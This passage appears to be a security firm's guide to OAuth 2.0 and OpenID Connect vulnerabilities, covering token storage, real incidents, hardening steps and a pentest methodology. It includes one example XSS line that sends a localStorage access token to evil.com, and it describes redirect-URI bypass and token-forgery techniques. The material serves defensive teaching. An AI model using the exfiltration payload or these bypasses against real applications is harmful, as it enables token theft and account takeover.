localStorage is a browser API that provides persistent key-value storage per origin. It is synchronous, easy to use, and available in all modern browsers. It is the most common token storage mechanism we find in single-page applications -- and the least secure.

The fundamental problem with localStorage is that it is accessible to any JavaScript running on the page. If an attacker achieves cross-site scripting (XSS) on the application, they can read every token stored in localStorage with a single line of JavaScript:

// Attacker's XSS payload
fetch('https://evil.com/steal?token=' + localStorage.getItem('access_token'));

XSS vulnerabilities are extremely common. They appear in the OWASP Top 10 and are present in a substantial percentage of the web applications we test. Storing tokens in localStorage means that any XSS vulnerability -- reflected, stored, or DOM-based -- is automatically escalated to a complete account takeover. The attacker does not need to perform any additional steps; they simply read the token and use it from their own machine.

Additional problems with localStorage: tokens persist indefinitely across browser restarts unless explicitly cleared, they remain readable by anyone with access to a shared device, and they are exposed to every third-party script the page loads -- analytics tags, ad scripts, and compromised CDN-hosted dependencies all run with full access to the same storage.

sessionStorage -- Marginally Better

sessionStorage is similar to localStorage but scoped to the browser tab and cleared when the tab is closed. This mitigates the persistence and shared device risks, but it is still fully accessible to JavaScript and therefore vulnerable to XSS. It is a marginal improvement, not a solution.

HTTP-Only Secure Cookies

The recommended approach for browser-based applications is to store tokens in HTTP-only, secure, same-site cookies. The security properties are significant: the HttpOnly flag makes the cookie invisible to JavaScript, so an XSS payload cannot simply read the token; the Secure flag ensures the cookie is only transmitted over HTTPS; and the SameSite attribute (Lax or Strict) prevents the browser from attaching the cookie to cross-site requests, mitigating CSRF.
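
As a concrete illustration (names and values ours), a helper that builds a Set-Cookie header for a server-side session that merely references tokens held on the backend:

```python
def session_cookie(name: str, value: str, max_age: int = 3600) -> str:
    """Build a Set-Cookie header value with the attributes discussed above.

    Only an opaque session identifier goes to the browser; the OAuth
    tokens it references stay server-side.
    """
    return (f"{name}={value}; Max-Age={max_age}; Path=/; "
            "HttpOnly; Secure; SameSite=Lax")
```

Most web frameworks expose the same attributes through their cookie APIs; the point is that all three flags are set together, not individually as an afterthought.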

The Backend-for-Frontend (BFF) Pattern

For single-page applications that use an authorization code flow, the recommended architecture is the Backend-for-Frontend (BFF) pattern. In this pattern, the SPA communicates with a lightweight backend server (the BFF) that handles the OAuth flow. The BFF stores the access token and refresh token server-side (in a session store), and the SPA authenticates to the BFF using an HTTP-only session cookie. The access token never reaches the browser.

This pattern provides the strongest security because tokens are never exposed to client-side JavaScript. The BFF acts as a confidential client (it has a client secret), can use PKCE for additional protection, and can implement token rotation and revocation without relying on client-side logic. The main drawback is the additional infrastructure complexity of maintaining a backend server for what would otherwise be a purely client-side application.

What we report: When we find tokens stored in localStorage, we report it as a medium-severity finding if no XSS vulnerability is present (because the risk is conditional on XSS), and as a high-severity finding if XSS is also present (because the combination enables direct account takeover). We always recommend migrating to HTTP-only cookies or the BFF pattern regardless of whether XSS is currently present, because XSS is a when-not-if proposition for most web applications.


Real-World Examples of OAuth Vulnerabilities in Production Applications

OAuth and OIDC vulnerabilities are not limited to small or poorly-maintained applications. Some of the most significant security incidents in major technology platforms have involved OAuth flaws. These examples illustrate the real-world impact of the vulnerability classes discussed in this article.

Facebook: OAuth Redirect URI Bypass Leading to Account Takeover (2013-2020, multiple instances)

Facebook's OAuth implementation has been a repeated target for security researchers. In 2013, researcher Nir Goldshlager discovered a series of redirect URI bypasses in Facebook's OAuth flow. By chaining open redirects on facebook.com subdomains with the OAuth authorization endpoint, he was able to steal access tokens for any Facebook user who clicked a malicious link. The attack chain leveraged the fact that Facebook allowed redirect URIs to any facebook.com subdomain, and several of these subdomains had open redirect vulnerabilities.

In subsequent years, multiple researchers found similar bypasses, including one in 2020 that leveraged a redirect URI validation flaw in combination with a dangling CNAME for a Facebook subdomain. Facebook paid significant bug bounties for these findings, but the pattern illustrates how difficult it is to get redirect URI validation right, even for organizations with world-class security teams.

Microsoft: Azure AD/Entra ID OAuth Misconfigurations

Microsoft's Entra ID (formerly Azure Active Directory) has been the subject of several high-profile OAuth security findings. In 2019, researchers from CyberArk demonstrated that misconfigured multi-tenant applications in Azure AD could be used to access other tenants' data by exploiting the consent framework. The attack involved registering a malicious application in one tenant, configuring it as multi-tenant, and tricking users in other tenants into granting consent. Because Azure AD's default settings allowed users to consent to applications requesting basic permissions, the attack could be executed without any administrator involvement.

In 2023, the "nOAuth" vulnerability demonstrated how a common misconfiguration in Azure AD OIDC integrations could lead to account takeover. Many applications used the email claim from Azure AD ID tokens as the unique identifier for users. However, Azure AD allows users to set arbitrary email addresses in their profile, and does not guarantee that the email claim has been verified. An attacker could set their Azure AD profile email to the victim's email address, authenticate to the target application via OIDC, and the application would match them to the victim's account based on the email claim. Microsoft's guidance was updated to recommend using the sub (subject) claim or oid (object ID) as the user identifier, as these are immutable and unique.

Slack: OAuth Token Leakage via Referer Headers (2019)

Security researcher Evan Custodio discovered that Slack's OAuth implementation leaked authorization codes through the Referer header. When a user completed the OAuth flow for a Slack application, the callback page included third-party tracking scripts. The full callback URL, including the authorization code, was sent to these third-party servers via the Referer header. While the authorization codes were short-lived, the timing window was sufficient for automated exploitation. Slack fixed the issue by implementing Referrer-Policy: no-referrer on their callback pages and switching to response_mode=form_post.

GitHub: OAuth State Parameter Bypass (2012)

In one of the earliest and most impactful OAuth CSRF attacks, researcher Egor Homakov demonstrated a login CSRF vulnerability in GitHub's OAuth implementation. GitHub's "Sign in with GitHub" flow for third-party applications did not validate the state parameter. Homakov was able to force other users to link their GitHub accounts to his third-party application, giving him access to their private repositories. This finding led to widespread awareness of the state parameter's importance and prompted many OAuth libraries to include state validation by default.

Google: OAuth Scope Escalation in Google Apps Script

In 2017, a sophisticated phishing attack leveraged Google's OAuth consent flow to trick users into granting a malicious application full access to their Gmail accounts. The attack used a legitimate-looking application named "Google Docs" that requested the https://mail.google.com/ scope, which grants complete access to the user's Gmail. The consent screen showed the request was from "Google Docs" (a name the attacker chose, not the official Google application), and many users approved it without reading the scope details. This attack demonstrated that consent screens alone are insufficient to prevent scope-based attacks when users are conditioned to click "Allow" without reading the fine print.

Various Bug Bounty Programs: JWT alg:none in Production

The alg:none JWT vulnerability has been reported in bug bounty programs for numerous major organizations. In 2020, a researcher discovered that a major financial institution's API gateway accepted JWTs with alg:none, allowing them to forge tokens as any user, including administrators. The root cause was that the API gateway used an outdated JWT library that accepted unsigned tokens by default. In another case, a healthcare platform's API accepted alg:none tokens, enabling access to patient medical records. These findings consistently receive critical severity ratings in bug bounty programs.

Lessons From the Real World

Several patterns emerge from these real-world examples:

- Redirect URI validation is hard to get right, even for organizations with world-class security teams
- Permissive defaults (subdomain-wide redirect allowances, user-consentable applications, unverified email claims) repeatedly become attack paths
- Mutable claims such as email must never be used as account identifiers; the immutable sub or oid claims should be used instead
- Consent screens do not protect users who are conditioned to click "Allow" without reading scope details
- Small omissions with no functional symptoms -- a missing state check, a missing Referrer-Policy header -- have enabled account takeover at the largest platforms


How Organizations Should Configure OAuth 2.0 and OpenID Connect

Based on our penetration testing experience and the current security best practices defined in RFC 9700 (OAuth 2.0 Security Best Current Practice) and the OpenID Connect specifications, here are the concrete steps organizations should take to secure their OAuth/OIDC implementations.

Authorization Server Configuration

- Enforce exact string matching of pre-registered redirect URIs; no wildcards, prefixes, or substring matches
- Require PKCE with the S256 method for all clients, and reject requests that omit or downgrade the code_challenge
- Make authorization codes single-use with short expiry, and redeem them atomically so concurrent exchanges cannot both succeed
- Issue short-lived access tokens and rotate refresh tokens on every use
- Disable the implicit flow and the resource owner password credentials grant

Client Application Configuration

- Generate, bind, and validate the state parameter (and the OIDC nonce) on every flow
- Set Referrer-Policy: no-referrer on callback pages, or use response_mode=form_post, so authorization codes never leak via the Referer header
- Store tokens in HTTP-only, Secure, SameSite cookies or behind a BFF; never in localStorage or sessionStorage
- Keep client secrets out of browser and mobile code; public clients must rely on PKCE, not embedded secrets

Resource Server (API) Configuration

- Verify JWT signatures against locally configured keys with a pinned algorithm list; never trust the token's alg, jwk, jku, or x5u headers
- Validate the exp, aud, and iss claims on every request
- Enforce scopes and fine-grained permissions at the endpoint level, and reject ID tokens presented as access tokens

Identity Provider Selection and Configuration


Common OAuth 2.0 and OIDC Vulnerabilities: Severity, Frequency, and Impact

The following table summarizes the most common OAuth/OIDC vulnerabilities we discover during penetration testing engagements, their typical severity ratings, how frequently we encounter them, and their potential impact.

| Vulnerability | Severity | Frequency | Impact |
|---|---|---|---|
| Redirect URI Validation Bypass | Critical | Common | Authorization code or token theft leading to full account takeover |
| Missing PKCE Enforcement | High | Very Common | Authorization code interception on public clients; defense-in-depth failure on confidential clients |
| Implicit Flow in Use | High | Common | Token exposure via browser history, referrer headers, and XSS |
| Missing or Invalid State Parameter | Medium-High | Very Common | Login CSRF, account linking CSRF, session fixation |
| JWT alg:none Accepted | Critical | Uncommon | Complete token forgery; impersonate any user including administrators |
| JWT RSA/HMAC Key Confusion | Critical | Uncommon | Complete token forgery using publicly available key material |
| JWT Signature Not Verified | Critical | Rare | Complete token forgery; arbitrary claim modification |
| Tokens in localStorage | Medium | Very Common | Token theft via XSS; escalates XSS to full account takeover |
| Token Leakage via Referrer | Medium | Common | Authorization code or token exposure to third-party servers |
| Scope Not Validated by API | High | Common | Privilege escalation; access to unauthorized API operations |
| Scope Escalation via Parameter Tampering | High | Moderate | Elevated access beyond user consent; data exfiltration |
| Expired Tokens Accepted | Medium | Common | Session replay; unauthorized access using stale credentials |
| Audience Claim Not Validated | Medium-High | Common | Cross-service token replay; confused deputy attacks |
| PKCE Downgrade Attack | High | Moderate | Negates PKCE protection; enables authorization code interception |
| Consent Screen Bypass | Medium-High | Moderate | Silent scope escalation; unauthorized data access without user awareness |
| JWK/JKU Header Injection | Critical | Rare | Complete token forgery via attacker-controlled verification key |
| Refresh Token Not Rotated | Medium | Common | Persistent access if refresh token is compromised; no detection mechanism |
| Client Secret Exposed | High | Moderate | Allows attacker to impersonate the client; exchange stolen authorization codes |

Several observations are worth noting from this data. The most critical vulnerabilities (alg:none, key confusion, JWK injection) are fortunately rare in modern applications because JWT libraries have improved their defaults. However, the most common vulnerabilities (missing PKCE, missing state parameter, tokens in localStorage, scope not validated) are widespread precisely because they are not dramatic failures -- they are misconfigurations and omissions that do not cause visible errors. Applications work perfectly with these issues present, and they are only discovered through security testing.

The combination of high-frequency, medium-severity vulnerabilities (like tokens in localStorage) with common but often low-priority vulnerabilities (like XSS) produces critical-impact attack chains. This is why OAuth security testing must be holistic: evaluating each component in isolation misses the compounding effect of combined vulnerabilities.


Advanced OAuth Attack Techniques Pentesters Should Know

Beyond the core vulnerability classes, several advanced attack techniques target specific aspects of OAuth/OIDC implementations. These techniques are commonly used in sophisticated penetration tests and red team engagements.

Authorization Code Injection

Authorization code injection is an attack where an attacker injects their own authorization code into a victim's OAuth flow. This is different from authorization code interception (where the attacker steals the victim's code). In an injection attack, the attacker initiates an OAuth flow, obtains their own authorization code, and then tricks the victim's browser into sending this code to the client's callback endpoint. If the client does not validate the state parameter (or if PKCE is not enforced), the client exchanges the attacker's code for the attacker's tokens and creates a session associated with the attacker's identity.

The impact depends on the application's behavior. If the application links the OAuth identity to the victim's existing session, the victim's account is now linked to the attacker's identity provider account, giving the attacker persistent access. This is a more sophisticated version of the CSRF attack described in the state parameter section, and it specifically targets applications where OAuth is used for account linking rather than primary authentication.
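
The standard defense is to bind an unguessable state value to the user's session and make it single-use; a sketch assuming a hypothetical server-side session dict:

```python
import hmac
import secrets

def begin_flow(session: dict) -> str:
    """Generate an unguessable state value and bind it to this session."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state  # included as the state parameter in the authorization request

def handle_callback(session: dict, returned_state: str) -> None:
    """Reject any callback whose state does not match this session's value."""
    expected = session.pop("oauth_state", None)  # pop makes it single-use
    if expected is None or not hmac.compare_digest(expected, returned_state):
        raise PermissionError("state mismatch: possible CSRF or code injection")
```

Because the value is consumed on first use, an injected or replayed callback fails even if the attacker somehow learns an old state value.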

Token Replay Across Services

In microservice architectures, a single authorization server often issues tokens used by multiple resource servers. If the aud (audience) claim is not validated by individual resource servers, a token obtained from one service can be replayed against another. For example, an employee with access to the "reporting" service can take their access token and use it to call the "admin" service if both services trust tokens from the same authorization server and neither validates the audience.

This attack is particularly effective in Kubernetes environments where service-to-service authentication uses JWTs from a common issuer. We have demonstrated this attack in multiple engagements by intercepting a JWT from a low-privilege service and replaying it against high-privilege API endpoints.

ID Token Reuse and Replay

OIDC ID tokens are intended for authentication -- verifying the user's identity at the time of login. They are not access tokens and should not be used for authorization. However, many applications use ID tokens as bearer tokens for API access, sending them in the Authorization header with each request. This creates several problems: ID tokens may have longer lifetimes than appropriate for API access, they may not include scope or permission claims, and they are not designed to be presented to resource servers (the aud claim in an ID token is the client application, not the resource server).

When ID tokens are used as access tokens, an attacker who obtains an ID token (through any of the leakage vectors described earlier) can replay it against the API for the token's entire lifetime.

Device Authorization Flow Abuse

The OAuth 2.0 Device Authorization Grant (RFC 8628) is designed for devices with limited input capabilities (smart TVs, IoT devices). The flow presents a user code that the user enters on a different device. Phishing attacks abuse this flow by presenting the user code in a social engineering context: the attacker initiates a device authorization flow, receives the user code, and sends it to the victim via email or chat with a message like "Enter this code to verify your identity." The victim enters the code, authorizes the attacker's device, and the attacker receives tokens for the victim's account.

This attack is particularly effective against Microsoft Entra ID and has been used in real-world phishing campaigns targeting enterprise organizations. The defense is to restrict the device authorization flow to clients that actually need it and to educate users about the risk of entering device codes from unsolicited messages.

Race Conditions in Token Exchange

Some authorization servers have race conditions in their token exchange endpoints. If two simultaneous requests present the same authorization code, both may succeed and return valid tokens before the server marks the code as used. An attacker who can replay the authorization code within a narrow timing window (typically milliseconds) can obtain their own set of tokens from the same authorization code. This is a difficult attack to execute in practice but is testable by sending concurrent requests from a penetration testing tool.
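
On the server side, the fix is to mark the code used atomically; a sketch with an in-memory store (a real deployment needs the same atomicity in its database or cache, e.g. a conditional delete-and-return):

```python
import threading
from typing import Dict, Optional

class CodeStore:
    """Single-use authorization codes with an atomic check-and-consume step."""

    def __init__(self) -> None:
        self._codes: Dict[str, str] = {}  # code -> client_id
        self._lock = threading.Lock()

    def issue(self, code: str, client_id: str) -> None:
        with self._lock:
            self._codes[code] = client_id

    def redeem(self, code: str) -> Optional[str]:
        # pop under the lock: concurrent redemptions cannot both succeed
        with self._lock:
            return self._codes.pop(code, None)
```

A check-then-delete sequence without the lock is exactly the race the attack exploits: two requests can both pass the check before either deletes the code.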


A Penetration Tester's Methodology for OAuth/OIDC Assessment

When we assess OAuth/OIDC implementations during a web application penetration test, we follow a systematic methodology that covers every vulnerability class discussed in this article. This section outlines our approach for security teams looking to conduct their own assessments.

Phase 1: Reconnaissance and Flow Mapping

Before testing for vulnerabilities, we map the entire OAuth flow by intercepting every request and response using Burp Suite or a similar proxy. The key information we gather includes:

- The authorization, token, and JWKS endpoints, plus the discovery document (/.well-known/openid-configuration) if one is published
- The response_type, client_id, redirect_uri, scope, state, and nonce parameters in use
- Whether PKCE is present and which code_challenge_method is used
- Whether the client is public or confidential, and where any client secret lives
- The token format (JWT or opaque), its claims and lifetimes, and where the application stores tokens after the flow completes

Phase 2: Redirect URI Testing

We systematically test the redirect URI validation by modifying the redirect_uri parameter in the authorization request:

- Substituting a wholly attacker-controlled domain
- Embedding the registered host in a subdomain or path of our own domain
- Appending path traversal sequences, trailing slashes, and extra path segments
- Changing the scheme, port, or case of the registered URI
- Adding query parameters, fragments, or duplicate redirect_uri parameters
- Chaining open redirects on allowed hosts to relay the code off-site
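
The only validation that reliably survives this kind of testing is exact string matching against pre-registered values; a minimal sketch (registration values hypothetical):

```python
# Hypothetical client registration; values are examples only
REGISTERED_REDIRECT_URIS = {
    "https://app.example.com/callback",
}

def redirect_uri_allowed(requested: str) -> bool:
    """Exact string match only: no prefixes, substrings, wildcards,
    or normalization that an attacker could abuse."""
    return requested in REGISTERED_REDIRECT_URIS
```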

Phase 3: Token Security Testing

For JWT tokens, we perform the full suite of JWT attacks described earlier: alg:none variants, RSA/HMAC key confusion, signature stripping, JWK/JKU/X5U injection, expired and wrong-audience tokens, individual claim tampering, and wholly invalid signatures.

For token storage, we inspect the browser's developer tools to determine where tokens are stored and verify the security attributes of cookies (HttpOnly, Secure, SameSite).

Phase 4: Flow Integrity Testing

We test the integrity of the OAuth flow itself:

- Removing, reusing, or altering the state parameter to probe for CSRF and authorization code injection
- Replaying authorization codes, including concurrently, to detect single-use enforcement failures and race conditions
- Omitting or downgrading the PKCE code_challenge to test for downgrade acceptance
- Tampering with the scope parameter between the consent screen and the token exchange

Phase 5: API-Level Token Validation

At the resource server level, we verify:

- That the token signature is verified on every request, with the algorithm pinned server-side
- That the exp, aud, and iss claims are enforced
- That granted scopes actually constrain which API operations succeed
- That ID tokens are rejected when presented as access tokens
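
When the token carries a space-delimited scope claim (the common layout, as in RFC 9068; some providers emit a list-valued scp claim instead), the endpoint-level check is short; a sketch:

```python
def require_scope(claims: dict, required: str) -> None:
    """Reject a request whose token lacks the scope this endpoint demands.

    Assumes a space-delimited "scope" claim; adjust for providers that
    emit a list-valued "scp" claim instead.
    """
    granted = set(claims.get("scope", "").split())
    if required not in granted:
        raise PermissionError(f"missing required scope: {required}")
```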


Conclusion

OAuth 2.0 and OpenID Connect are the foundation of modern authentication and authorization. When implemented correctly, they provide a secure, flexible, and user-friendly framework for delegated access. When implemented incorrectly -- which, based on our penetration testing experience, is the majority of the time -- they create vulnerabilities that directly lead to account takeover, unauthorized data access, and privilege escalation.

The core message of this guide is that OAuth security is not about following a single best practice. It is about getting every detail right simultaneously: exact redirect URI matching, mandatory PKCE, validated state parameters, proper JWT verification, secure token storage, scope enforcement at the API level, and defense-in-depth at every step. A single missed control is often all an attacker needs.

The OAuth 2.0 Security Best Current Practice (RFC 9700) consolidates years of security research into a single, actionable document. If your OAuth implementation was built before this document existed, it almost certainly has vulnerabilities that need to be addressed. If it was built after, it may still have issues if the developers did not follow every recommendation.

Automated scanning tools detect some OAuth vulnerabilities -- they can identify the use of the implicit flow, missing Referrer-Policy headers, and tokens in localStorage. But they cannot test redirect URI bypass chains, consent screen manipulation, JWT key confusion attacks, scope escalation via parameter tampering, or the many subtle interaction effects between OAuth components. These require manual penetration testing by security professionals who understand the protocol deeply.

If your application uses OAuth 2.0 or OpenID Connect -- and it almost certainly does -- a dedicated authentication and authorization security assessment is not optional. It is the minimum standard of care for protecting your users' accounts and data.

Secure Your OAuth Implementation

Lorikeet Security's web application penetration tests include deep authentication and authorization testing -- including OAuth/OIDC flow analysis, token security validation, and consent bypass testing.


Lorikeet Security Team

Penetration Testing & Cybersecurity Consulting

We've completed 170+ security engagements across web apps, APIs, cloud infrastructure, and AI-generated codebases. Everything we publish here comes from patterns we see in real client work.
